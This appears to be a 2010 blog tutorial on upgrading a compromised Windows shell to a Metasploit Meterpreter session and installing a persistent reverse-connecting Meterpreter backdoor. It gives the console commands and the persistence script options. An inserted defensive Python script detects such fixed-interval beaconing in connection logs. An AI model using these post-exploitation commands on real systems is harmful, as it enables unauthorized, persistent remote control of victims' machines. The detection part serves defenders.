Thursday, June 17, 2010

Upgrading from shell to meterpreter and then adding persistence

Say you compromised a box and installed a backdoor that provides you with shell access. You connect to the backdoor listener and would like to do a lot more than what the Windows command prompt will allow you to do. Like most of us, you will want access to meterpreter ("Google meterpreter if you don't have a clue what it is"). We can upgrade our regular shell to a meterpreter session using Metasploit.

You can follow the examples on:

Just a quick summary.
After you connect to the listener on the victim machine:
[ctrl z] to background the session
# setg LHOST ip_addr //this is the IP of the attacker's machine running Metasploit
# setg LPORT port_num //the port number to use for the upgraded session
# sessions -u 1 //where 1 is the session number of the regular shell session

I've only gotten this working when the victim machine had the backdoor or service waiting for shell connections, meaning that when I compromised the box, I used a bind_shell payload or the victim had some kind of listener (like netcat) that would give you shell access when connected. I could not get this working when using a reverse_tcp shell payload initially.

When you have a meterpreter session, to add a persistent reverse-connecting meterpreter client you can use the "persistence" script with options as follows:

meterpreter> run persistence -A -i 5 -p 4444 -r

'-A' : Automatically starts a matching multi/handler to listen for incoming connections
'-i' : Interval in seconds between each connection attempt
'-p' : Port on the remote host where Metasploit is listening
'-r' : IP of the system running the Metasploit listener
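The '-i' and '-p' options are also what make this kind of persistence visible to the people defending the box: a client that retries every fixed number of seconds to the same host and port produces connection logs with a very regular rhythm. The script below is an added example (not from the original post or from Metasploit) that parses a constructed, simplified connection log in the form `<unix_ts> <src_ip> -> <dst_ip>:<dst_port>`, groups connections by source, destination and port, and flags any pair whose inter-connection gaps are both numerous and nearly constant. The log format, thresholds and sample addresses are assumptions for the example.

```python
"""Flag fixed-interval outbound callbacks (beaconing) in a connection log.

Added example, not code from the original post or from Metasploit. The log
format used here is constructed for the example:
    <unix_ts> <src_ip> -> <dst_ip>:<dst_port>
"""
import re
from collections import defaultdict
from statistics import mean, pstdev

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+->\s+(\S+):(\d+)\s*$")

# Constructed sample log. Host 10.0.0.5 reconnects to 192.0.2.10:4444 roughly
# every 5 seconds (one gap stretched by a second of latency), while
# 10.0.0.9 talks to a web server at irregular, human-driven intervals.
SAMPLE_LOG = """\
1276780000 10.0.0.5 -> 192.0.2.10:4444
1276780001 10.0.0.9 -> 203.0.113.7:443
1276780005 10.0.0.5 -> 192.0.2.10:4444
1276780010 10.0.0.5 -> 192.0.2.10:4444
1276780013 10.0.0.9 -> 203.0.113.7:443
1276780016 10.0.0.5 -> 192.0.2.10:4444
1276780021 10.0.0.5 -> 192.0.2.10:4444
1276780026 10.0.0.5 -> 192.0.2.10:4444
1276780047 10.0.0.9 -> 203.0.113.7:443
1276780050 10.0.0.9 -> 203.0.113.7:443
1276780070 10.0.0.9 -> 203.0.113.7:443
1276780001 10.0.0.9 -> 203.0.113.7:443
"""


def parse_log(text):
    """Yield (timestamp, src, dst, port) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, port = m.groups()
            yield int(ts), src, dst, int(port)


def find_beacons(text, min_hits=5, max_jitter=0.2):
    """Return connection pairs that look like periodic callbacks.

    A pair is flagged when it has at least `min_hits` connections and the
    spread of the gaps between them (population std dev / mean gap) is at
    most `max_jitter`. Real beacons show small jitter; browsing does not.
    """
    seen = defaultdict(list)
    for ts, src, dst, port in parse_log(text):
        seen[(src, dst, port)].append(ts)

    findings = []
    for (src, dst, port), times in seen.items():
        if len(times) < min_hits:
            continue
        times.sort()  # log lines may arrive out of order
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all connections in the same second; not a schedule
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            findings.append({
                "src": src,
                "dst": dst,
                "port": port,
                "hits": len(times),
                "interval": round(avg, 1),
                "jitter": round(jitter, 3),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dst']}:{f['port']} "
              f"every ~{f['interval']}s ({f['hits']} hits, jitter {f['jitter']})")
```

On the sample data only the 10.0.0.5 -> 192.0.2.10:4444 pair is reported (six hits about 5.2 seconds apart); the web traffic has enough connections but its gaps vary too much to pass the jitter threshold. On real firewall or Sysmon network data the same grouping works, with `min_hits` raised to match how long a window of logs you are examining.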

If you opted not to use the '-A' option, you can always start the multi/handler manually:

# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lport=4444 lhost= E

I've had one instance where, after the reverse meterpreter session connected and then disconnected, it refused to automatically connect again. I really had no answer for that problem at the time, but what worked for me was migrating to a process with system privileges (like explorer.exe) and then disconnecting. The script then kept sending its reverse connections back to my Metasploit box as it should.

Resources / Good Reading:
